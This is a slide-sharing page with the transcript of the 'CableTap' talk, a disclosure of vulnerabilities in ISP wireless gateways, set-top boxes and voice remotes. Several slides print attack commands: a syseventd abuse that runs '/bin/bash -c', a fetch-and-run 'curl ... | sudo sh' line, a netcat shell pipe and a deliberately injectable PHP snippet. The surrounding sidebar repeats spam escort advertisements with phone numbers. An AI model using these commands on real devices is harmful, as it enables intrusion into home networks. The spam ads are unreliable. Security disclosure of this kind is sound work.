Call Girls In Sukhdev Vihar Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Sukhdev Vihar Delhi 💯Call Us 🔝8264348440🔝Call Girls In Sukhdev Vihar Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Sukhdev Vihar Delhi 💯Call Us 🔝8264348440🔝
soniya singh
 
Hot Service (+9316020077 ) Goa Call Girls Real Photos and Genuine Service
Hot Service (+9316020077 ) Goa Call Girls Real Photos and Genuine ServiceHot Service (+9316020077 ) Goa Call Girls Real Photos and Genuine Service
Hot Service (+9316020077 ) Goa Call Girls Real Photos and Genuine Service
sexy call girls service in goa
 
Low Sexy Call Girls In Mohali 9053900678 🥵Have Save And Good Place 🥵
Low Sexy Call Girls In Mohali 9053900678 🥵Have Save And Good Place 🥵Low Sexy Call Girls In Mohali 9053900678 🥵Have Save And Good Place 🥵
Low Sexy Call Girls In Mohali 9053900678 🥵Have Save And Good Place 🥵
Chandigarh Call girls 9053900678 Call girls in Chandigarh
 
Top Rated Pune Call Girls Daund ⟟ 6297143586 ⟟ Call Me For Genuine Sex Servi...
Top Rated Pune Call Girls Daund ⟟ 6297143586 ⟟ Call Me For Genuine Sex Servi...Top Rated Pune Call Girls Daund ⟟ 6297143586 ⟟ Call Me For Genuine Sex Servi...
Top Rated Pune Call Girls Daund ⟟ 6297143586 ⟟ Call Me For Genuine Sex Servi...
Call Girls in Nagpur High Profile
 
AWS Community DAY Albertini-Ellan Cloud Security (1).pptx
AWS Community DAY Albertini-Ellan Cloud Security (1).pptxAWS Community DAY Albertini-Ellan Cloud Security (1).pptx
AWS Community DAY Albertini-Ellan Cloud Security (1).pptx
ellan12
 
VVVIP Call Girls In Connaught Place ➡️ Delhi ➡️ 9999965857 🚀 No Advance 24HRS...
VVVIP Call Girls In Connaught Place ➡️ Delhi ➡️ 9999965857 🚀 No Advance 24HRS...VVVIP Call Girls In Connaught Place ➡️ Delhi ➡️ 9999965857 🚀 No Advance 24HRS...
VVVIP Call Girls In Connaught Place ➡️ Delhi ➡️ 9999965857 🚀 No Advance 24HRS...
Call Girls In Delhi Whatsup 9873940964 Enjoy Unlimited Pleasure
 
Russian Call girl in Ajman +971563133746 Ajman Call girl Service
Russian Call girl in Ajman +971563133746 Ajman Call girl ServiceRussian Call girl in Ajman +971563133746 Ajman Call girl Service
Russian Call girl in Ajman +971563133746 Ajman Call girl Service
gwenoracqe6
 
Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...
Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...
Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...
Sheetaleventcompany
 
Hire↠Young Call Girls in Tilak nagar (Delhi) ☎️ 9205541914 ☎️ Independent Esc...
Hire↠Young Call Girls in Tilak nagar (Delhi) ☎️ 9205541914 ☎️ Independent Esc...Hire↠Young Call Girls in Tilak nagar (Delhi) ☎️ 9205541914 ☎️ Independent Esc...
Hire↠Young Call Girls in Tilak nagar (Delhi) ☎️ 9205541914 ☎️ Independent Esc...
Delhi Call girls
 
Pune Airport ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready...
Pune Airport ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready...Pune Airport ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready...
Pune Airport ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready...
tanu pandey
 
Call Girls in Prashant Vihar, Delhi 💯 Call Us 🔝9953056974 🔝 Escort Service
Call Girls in Prashant Vihar, Delhi 💯 Call Us 🔝9953056974 🔝 Escort ServiceCall Girls in Prashant Vihar, Delhi 💯 Call Us 🔝9953056974 🔝 Escort Service
Call Girls in Prashant Vihar, Delhi 💯 Call Us 🔝9953056974 🔝 Escort Service
9953056974 Low Rate Call Girls In Saket, Delhi NCR
 
WhatsApp 📞 8448380779 ✅Call Girls In Mamura Sector 66 ( Noida)
WhatsApp 📞 8448380779 ✅Call Girls In Mamura Sector 66 ( Noida)WhatsApp 📞 8448380779 ✅Call Girls In Mamura Sector 66 ( Noida)
WhatsApp 📞 8448380779 ✅Call Girls In Mamura Sector 66 ( Noida)
Delhi Call girls
 
2nd Solid Symposium: Solid Pods vs Personal Knowledge Graphs
2nd Solid Symposium: Solid Pods vs Personal Knowledge Graphs2nd Solid Symposium: Solid Pods vs Personal Knowledge Graphs
2nd Solid Symposium: Solid Pods vs Personal Knowledge Graphs
EleniIlkou
 
All Time Service Available Call Girls Mg Road 👌 ⏭️ 6378878445
All Time Service Available Call Girls Mg Road 👌 ⏭️ 6378878445All Time Service Available Call Girls Mg Road 👌 ⏭️ 6378878445
All Time Service Available Call Girls Mg Road 👌 ⏭️ 6378878445
ruhi
 

Recently uploaded (20)

valsad Escorts Service ☎️ 6378878445 ( Sakshi Sinha ) High Profile Call Girls...
valsad Escorts Service ☎️ 6378878445 ( Sakshi Sinha ) High Profile Call Girls...valsad Escorts Service ☎️ 6378878445 ( Sakshi Sinha ) High Profile Call Girls...
valsad Escorts Service ☎️ 6378878445 ( Sakshi Sinha ) High Profile Call Girls...
 
GDG Cloud Southlake 32: Kyle Hettinger: Demystifying the Dark Web
GDG Cloud Southlake 32: Kyle Hettinger: Demystifying the Dark WebGDG Cloud Southlake 32: Kyle Hettinger: Demystifying the Dark Web
GDG Cloud Southlake 32: Kyle Hettinger: Demystifying the Dark Web
 
Russian Call Girls in %(+971524965298 )# Call Girls in Dubai
Russian Call Girls in %(+971524965298 )# Call Girls in DubaiRussian Call Girls in %(+971524965298 )# Call Girls in Dubai
Russian Call Girls in %(+971524965298 )# Call Girls in Dubai
 
Call Now ☎ 8264348440 !! Call Girls in Shahpur Jat Escort Service Delhi N.C.R.
Call Now ☎ 8264348440 !! Call Girls in Shahpur Jat Escort Service Delhi N.C.R.Call Now ☎ 8264348440 !! Call Girls in Shahpur Jat Escort Service Delhi N.C.R.
Call Now ☎ 8264348440 !! Call Girls in Shahpur Jat Escort Service Delhi N.C.R.
 
Call Girls In Sukhdev Vihar Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Sukhdev Vihar Delhi 💯Call Us 🔝8264348440🔝Call Girls In Sukhdev Vihar Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Sukhdev Vihar Delhi 💯Call Us 🔝8264348440🔝
 
Hot Service (+9316020077 ) Goa Call Girls Real Photos and Genuine Service
Hot Service (+9316020077 ) Goa Call Girls Real Photos and Genuine ServiceHot Service (+9316020077 ) Goa Call Girls Real Photos and Genuine Service
Hot Service (+9316020077 ) Goa Call Girls Real Photos and Genuine Service
 
DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024
DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024
DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024
 
Low Sexy Call Girls In Mohali 9053900678 🥵Have Save And Good Place 🥵
Low Sexy Call Girls In Mohali 9053900678 🥵Have Save And Good Place 🥵Low Sexy Call Girls In Mohali 9053900678 🥵Have Save And Good Place 🥵
Low Sexy Call Girls In Mohali 9053900678 🥵Have Save And Good Place 🥵
 
Top Rated Pune Call Girls Daund ⟟ 6297143586 ⟟ Call Me For Genuine Sex Servi...
Top Rated Pune Call Girls Daund ⟟ 6297143586 ⟟ Call Me For Genuine Sex Servi...Top Rated Pune Call Girls Daund ⟟ 6297143586 ⟟ Call Me For Genuine Sex Servi...
Top Rated Pune Call Girls Daund ⟟ 6297143586 ⟟ Call Me For Genuine Sex Servi...
 
AWS Community DAY Albertini-Ellan Cloud Security (1).pptx
AWS Community DAY Albertini-Ellan Cloud Security (1).pptxAWS Community DAY Albertini-Ellan Cloud Security (1).pptx
AWS Community DAY Albertini-Ellan Cloud Security (1).pptx
 
Trump Diapers Over Dems t shirts Sweatshirt
Trump Diapers Over Dems t shirts SweatshirtTrump Diapers Over Dems t shirts Sweatshirt
Trump Diapers Over Dems t shirts Sweatshirt
 
VVVIP Call Girls In Connaught Place ➡️ Delhi ➡️ 9999965857 🚀 No Advance 24HRS...
VVVIP Call Girls In Connaught Place ➡️ Delhi ➡️ 9999965857 🚀 No Advance 24HRS...VVVIP Call Girls In Connaught Place ➡️ Delhi ➡️ 9999965857 🚀 No Advance 24HRS...
VVVIP Call Girls In Connaught Place ➡️ Delhi ➡️ 9999965857 🚀 No Advance 24HRS...
 
Russian Call girl in Ajman +971563133746 Ajman Call girl Service
Russian Call girl in Ajman +971563133746 Ajman Call girl ServiceRussian Call girl in Ajman +971563133746 Ajman Call girl Service
Russian Call girl in Ajman +971563133746 Ajman Call girl Service
 
Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...
Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...
Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...
 
Hire↠Young Call Girls in Tilak nagar (Delhi) ☎️ 9205541914 ☎️ Independent Esc...
Hire↠Young Call Girls in Tilak nagar (Delhi) ☎️ 9205541914 ☎️ Independent Esc...Hire↠Young Call Girls in Tilak nagar (Delhi) ☎️ 9205541914 ☎️ Independent Esc...
Hire↠Young Call Girls in Tilak nagar (Delhi) ☎️ 9205541914 ☎️ Independent Esc...
 
Pune Airport ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready...
Pune Airport ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready...Pune Airport ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready...
Pune Airport ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready...
 
Call Girls in Prashant Vihar, Delhi 💯 Call Us 🔝9953056974 🔝 Escort Service
Call Girls in Prashant Vihar, Delhi 💯 Call Us 🔝9953056974 🔝 Escort ServiceCall Girls in Prashant Vihar, Delhi 💯 Call Us 🔝9953056974 🔝 Escort Service
Call Girls in Prashant Vihar, Delhi 💯 Call Us 🔝9953056974 🔝 Escort Service
 
WhatsApp 📞 8448380779 ✅Call Girls In Mamura Sector 66 ( Noida)
WhatsApp 📞 8448380779 ✅Call Girls In Mamura Sector 66 ( Noida)WhatsApp 📞 8448380779 ✅Call Girls In Mamura Sector 66 ( Noida)
WhatsApp 📞 8448380779 ✅Call Girls In Mamura Sector 66 ( Noida)
 
2nd Solid Symposium: Solid Pods vs Personal Knowledge Graphs
2nd Solid Symposium: Solid Pods vs Personal Knowledge Graphs2nd Solid Symposium: Solid Pods vs Personal Knowledge Graphs
2nd Solid Symposium: Solid Pods vs Personal Knowledge Graphs
 
All Time Service Available Call Girls Mg Road 👌 ⏭️ 6378878445
All Time Service Available Call Girls Mg Road 👌 ⏭️ 6378878445All Time Service Available Call Girls Mg Road 👌 ⏭️ 6378878445
All Time Service Available Call Girls Mg Road 👌 ⏭️ 6378878445
 

CableTap - Wirelessly Tapping Your Home Network

  • 1. Cabletap Wirelessly Tapping your home network MARC NEWLIN @MARCNEWLI N LOGAN LAMB LOGAN@BASTILLE .IO CHRIS GRAYSON @_LAVALAMP
  • 2. WELCOME TO THE LINECON AFTER-PARTY.
  • 3. MARC NEWLIN (@marcnewlin)W I R E L E S S S E C U R I T Y R E S E A R C H E R @ B A S T I L L E N E T W O R K S
  • 4. CHRISTOPHER GRAYSON (@_lavalamp)F O U N D E R / P R I N C I P A L E N G I N E E R @ W E B S I G H T
  • 5. LOGAN LAMB (logan@bastille.io) R E S E A R C H E R @ B A S T I L L E N E T W O R K S
  • 6. • 26 CVEs • ISP-provided wireless gateways, set-top boxes, and voice remotes • Cisco, Arris, Technicolor, Motorola, Xfinity (voice remote) • Multiple unauthenticated RCE attack chains • Network / application vulnerabilities • Wi-Fi vulnerabilities • ZigBee RF4CE vulnerabilities What is CableTap?
  • 7. • Full compromise of affected devices • Wide impact • ISP vulnerabilities • Vendor vulnerabilities • RDK vulnerabilities (software stack used by many major ISPs) • Attack chains affecting Comcast XFINITY devices have been patched Why does CableTap matter?
  • 8. AGENDA 1. Background on RDK 2. RDK-based devices 3. Progression of research 4. Vulnerabilities 5. Disclosure process 6. Q&A
  • 10. REFERENCE DEVELOPMENT KIT (RDK) • “a standardized software stack with localization plugins created to accelerate the deployment of next- gen video products and services by multichannel video providers (MVPDs).” • Founded in 2012 • Standardized software stack for modems, set top boxes, media devices https://rdkcentral.com/ C
  • 11. An open-source, community- driven project available at: https://code.rdkcentral.com/ But wait what’s this WHOIS record? Ohhhh that sinking feeling in the pit of my stomach… YAY OPEN SOURCE (?) SOFTWARE!
  • 12. • There’s the open source version, then there’s the versions deployed on deployed devices • Lots of vulns patched in the open source repo • Patches take months to deploy, no CVEs filed for, no disclosure to affected customers • Still faster to deploy patches with RDK than non- standardized “native” stacks • RCE, XSS, XSRF, you name it they got it YEAH BUT WHO NEEDS PATCHES ANYHOO
  • 14. RDK DEVICES ● RDK-V (Video) ○ set-top boxes ● RDK-B (Broadband) ○ gateways
  • 15. GENERAL RDK FEATURES Remote Management Subsystem Diagnostics Security Subsystem Media Framework
  • 16. • Embedded Linux • Lots of IO • AV/Ethernet/Coax/USB/eSata • Media Framework uses Webkit • Supports keyboard and mouse • More pictures: https://fccid.io/ACQ- XG1
  • 18. RDK-BROADBAND • Two systems on one board • Inter-processor communication over a switch • Intel Puma • Network Processor - ARM core • Application Processor - Intel Atom • Generally has two serial ports active Annotated dpc3939 internals here
  • 20. MARC LEARNS TO NETCAT Project inspiration (Peter Geissler’s talk @ HITB) Connecting with Chris Prior Comcast customer (Marc’s ISP) “Beyond your cable modem” 32C3 talk “How do I webapp security plz?” Pulling off the filesystem using the previously disclosed web UI ping vuln Digging into the RDK repos M
  • 21. GETTING SERIOUS Finding some vulns and getting serious Bringing the side project to Bastille Bringing Logan into the fold Hardware and embedded hacking expertise Expanding to set-top boxes Disclosing to vendors as new vulnerabilities are found M
  • 23. VULNS - HIDDEN HOME SECURITY WIFI Home security service offered by many ISPs Touchscreen control panel connects over WiFi Hidden WiFi network runs on the customer’s gateway SSID and passphrase generated based on the CM MAC Hidden WiFi network, previously documented online Web UI access point index “hack” XHS-XXXXXXXX SSID format, based on CM MAC Grepping around for “calculate” “generate” “key” “psk” etc M
  • 24. VULNS - HIDDEN HOME SECURITY WIFI CalculatePSKKey in <some binary> Cross compiling for big-endian ARM and running a keygen binary on the gateway Guesswork yielding the CM MAC input and PSK key output Command line binary observed on some devices How to get the CM MAC?? M
  • 25. VULNS - DHCP ACK CM MAC LEAK 1. Connect to “xfinitywifi” network 2. CM MAC of the wireless gateway is included in the DHCP ACK 3. Generate hidden home security network SSID and passphrase M
  • 26. VULNS - IPV6 MULTICAST CM MAC LEAK 1. Sniff the 802.11 channel used by the target wireless gateway 2. Every ~4 seconds, a 156-byte IPv6 multicast packet is transmitted with the l2sd0.500 interface MAC address 3. Translate the l2sd0.500 MAC to the CM MAC 4. Generate hidden home security network SSID and passphrase 11:22:33:44:55:66 - l2sd0.500 0F:22:33:44:55:63 - CM MAC M
  • 27. FQDN: m001122334455.atlt6.ga.comcast.net CM MAC: 00:11:22:33:44:53 <-- last octet decreased by 2 1.mta0 (VoIP) interface has FQDN containing the mta0 MAC 2.Translate the mta0 MAC into the CM MAC 3.Generate hidden home security network SSID and passphrase VULNS - eMTA FQDN CM MAC LEAK
  • 28. VULNS - IPV6 ADDRESSING FROM CM MACS Global IPv6 Link-local IPv6 Given the following inputs: Region identifier: 40:11 (Atlanta) Unknown octet: 53 (can be brute forced) MAC address: 11:22:33:44:55:66 The following wan0 IPv6 address is generated: 2001:0558:4011:0053:1122:33FF:FE44:5566 M
  • 29. COMCAST VS PUBLIC INTERNET DEVICE ACCESS Web UI supports MSO login from WAN only SSH service from WAN only Internet-facing network configuration appears well locked-down M
  • 30. XFINITY SEND-TO-TV Xifinity customer signs in with their account credentials Web app accepts URL Set-top box displays URL in a web browser M
  • 31. VULNS - XFINITY SEND-TO-TV / REMOTE WEB UI Gateway web UI accepts remote requests from Comcast infrastructure MSO login using the POTD Alternative hard-coded credentials IPv6 address of target gateway provides remote web UI access via set-top box
  • 32. Vulns - POTD “Password of the day” can be generated on a wireless gateway Used for remote web UI authentication Used for remote SSH authentication M
  • 33. VULNS - FREE INTERNET • Public wifi access points run by ISPs • e.g. “CableWiFi”, “xfinitywifi”, etc • AP’s are on customer equipment or ISP equipment • Customer logs into their ISP account to get access M • MAC address is remembered for future access • Attacker can spoof the MAC • Free Internet on other public access points • “xfinitywifi” usage does not count toward a customer’s
  • 35. IT’S LIKE CGI, BUT FAST & W/ EXPLOITS • FastCGI – successor to the Common Gateway Interface (CGI) protocol • Authored in 1996 • Enables web servers to invoke other processes – birth of dynamic generation of web content • No RFC, only documentation from MIT .edu site • Responder, Authorizer, and Filter modes of operation C
  • 36. • PHP + FastCGI – what could possibly go wrong?! • Lets you reconfigure PHP settings on every request • HTTP POST data supplied via STDIN FastCGI parameter • If only there were abusable PHP configuration values… PHP FASTCGI PROCESS MANAGER (PHP- FPM)
  • 37. PIECING THINGS TOGETHER • We can… • Reconfigure the PHP interpreter to include an arbitrary file • Supply data to STDIN via HTTP POST • But how do we include STDIN? • PHP TO THE RESCUE! • php://stdin
  • 38. ISN’T THIS OLD NEWS? • Yes… Kind of (CVE-2012-1823) • Previous work was on exploiting the PHP- CGI binary residing within a web directory • But what if the PHP-CGI binary is bound to a network port? • Nmap sees as tcpwrapped (TCP 1026- 1029) • Scripts for detection included in CableTap code repo 37,449PHPFPM servers on port 1026 (IPv4 address space) C
  • 39. A TWIST IN RDK’S PHPFPM • PHPFPM on the RDK deployments we tested had the PHP configuration component stripped out • No publicly-available documentation as to how to do this – why was it removed? • Could still gain code execution by referencing PHP files on the system and bypassing control flow guards in the default web app C
  • 40. SYSEVENTD – RCE AS A SERVICE (RAAS) • Binary protocol listener on TCP 52,367 (all interfaces) • Not the same as Oracle syseventd! • Intended for firing off commands based on system events (logging??) • No auth, no nothing! C
  • 41. SYSEVENTD USAGE 1. Create an event with a name and a binary to call upon event occurrence (name must be a file path) 1. Trigger the event by touching the event name file path and providing an argument 1. Binary is called with event name and arguments passed to command via execv $ sysevent --port 52367 --ip 172.16.12.1 async </path/to/file> /bin/cp $ sysevent --port 52367 --ip 172.16.12.1 set </path/to/file> /var/IGD/<file> $ /bin/cp </path/to/file> /var/IGD/</file> C
  • 42. SYSEVENTD (AB)USAGE /bin/cp /foo/bbhm_cur_cfg.xml /bar/baz/bbhm_cur_cfg.xml /bin/bash –c “<commands to execute>” • Create an event with a target process of /bin/bash and an event name of -c • Trigger the event with a value of the bash command to run • ??? • Profit C
  • 43. WHERE THE SYSEVENTD AT?! • Bound to all interfaces • Sometimes not firewalled off from public-facing IP address • Otherwise exposed to plenty of the LAN IPs 149,162Syseventd services on TCP 52,367 (IPv4 address space) C
  • 44. A TALE OF TWO OPERATING SYSTEMS • Two operating systems on the board • One ARM (modem w/ web app) and one Atom (router) • Modem is at bottom of range (10.0.0.1) and Atom is at top of range (10.0.0.254) C
  • 45. I MAKE MY OWN ROUTES DAMMIT • Atom OS has an interface allocated in 169.254.0.0/16 range for Dbus • …You can route to it if you’re into that sort of thing • Custom RPC service that is quite literally RCE as service, and all that FastCGI goodness • Once on Atom side, hardcoded root SSH creds to ARM side on 192.168.0.0/16 ip route add 169.254.0.1 via 10.0.0.254 C
  • 46. SET-TOP BOX VULNS Remote web inspector Arbitrary file read Root command execution RF4CE remote force pairing RF4CE remote force OTA L
  • 47. REMOTE WEB INSPECTOR Comparable to FireFox and Chrome DevTools, accessible from over the internet L
  • 48. ARBITRARY FILE READ ● Found a route that looked like it was for reading files from the filesystem ● The route is for reading files from the filesystem L
  • 49. ROOT COMMAND EXECUTION Sanitize your inputs!!! Sanitize your inputs!!! Sanitize your inputs!!! sudo make install curl http://totallylegit.com | sudo sh nc -l -p 8080 0.0.0.0 | sudo sh <?php $name = $_POST["name"]; shell_exec("echo hello $name"); ?>
  • 50. VOICE REMOTE OVERVIEW Control your STB with your voice! Wireless instead of IR! Motion activated lights! TI CC2530 with RF4CE stack
  • 51. RF4CE OVERVIEW Zigbee protocol for remote control Key exchange is unencrypted
  • 52. RF4CE MSO (OPENCABLE) OVERVIEW Uses RF4CE For remote control of cable equipment Binding process is not rate limited
  • 53. RF4CE REMOTE FORCED PAIRING Emulate remote Entire binding process in under one second ~2 hours to force pair remote L
  • 54. RF4CE REMOTE FORCED OTA Firmware package ISN’T signed 1)Modify update daemon 2)Modify firmware payload 3)Fix CRC and version 4)OTA :) L
  • 56. KNOWN AFFECTED DEVICES Vendor Model Type Tested ISP CVE Count Cisco DPC3939 Wireless Gateway Xfinity 16 Cisco DPC3939B Wireless Gateway Comcast Business 13 Technicolor DPC3941T Wireless Gateway Xfinity 11 Arris TG1682G Wireless Gateway Xfinity 12 Technicolor TC8717T* Wireless Gateway Time Warner 1 Motorola MX011ANM Set-Top Box Xfinity 6 Xfinity XR11-20 ZigBee Voice Remote Xfinity 1 M
  • 57. KNOWN NON-RDK DEVICES Vendor Model Type Tested ISP Arris TG1682G Wireless Gateway Spectrum Technicolor TC8717T Wireless Gateway Mediacom Technicolor TC8717T Wireless Gateway Time Warner Arris TG2492LG-VM Wireless Gateway (Super Hub 3.0) Virgin Media Compal CH7465LG-LC Wireless Gateway (Connect Box) Unitymedia Technicolor TC8305C Wireless Gateway Xfinity Arris TG1682G Wireless Gateway Cox M
  • 58. DISCLOSURE TIMELINE 03/27/2017 Group 1 Vendor Disclosures 03/28/2017 Group 2 Vendor Disclosures 04/20/2017 Group 3 Vendor Disclosures 04/28/2017 Group 4 Vendor Disclosures 07/11/2017 Abstract goes live on defcon.org 07/28/2018 Public Disclosure (all groups) M
  • 59. REMEDIATION AND MITIGATION Unauthenticated RCE attack chains affecting Comcast XFINITY devices have been remediated Customers of other ISPs should contact their ISP to determine if their hardware is affected by CableTap M
  • 60. FINAL REMARKS Not enough time to talk about all of the vulnerabilities Please see our whitepaper for further details <link to whitepaper> We found a substantial number of vulns, but the most severe have been patched (hooray!) M
  • 61. Q&A Thank you for watching our talk :) Thanks to Bastille for supporting our research. Thanks to Comcast for remediating the unauthenticated RCE attack chains affecting Xfinity-branded devices. MARC NEWLIN Bastille Networks marc@bastille.io @marcnewlin LOGAN LAMB Bastille Networks logan@bastille.io CHRIS GRAYSON Web Sight chris@websight.io @_lavalamp

Editor's Notes

  1. Web development Academic researcher Haxin’ all the things Founder & Principal Engineer (Web Sight)
  2. Web development Academic researcher Haxin’ all the things Founder & Principal Engineer (Web Sight)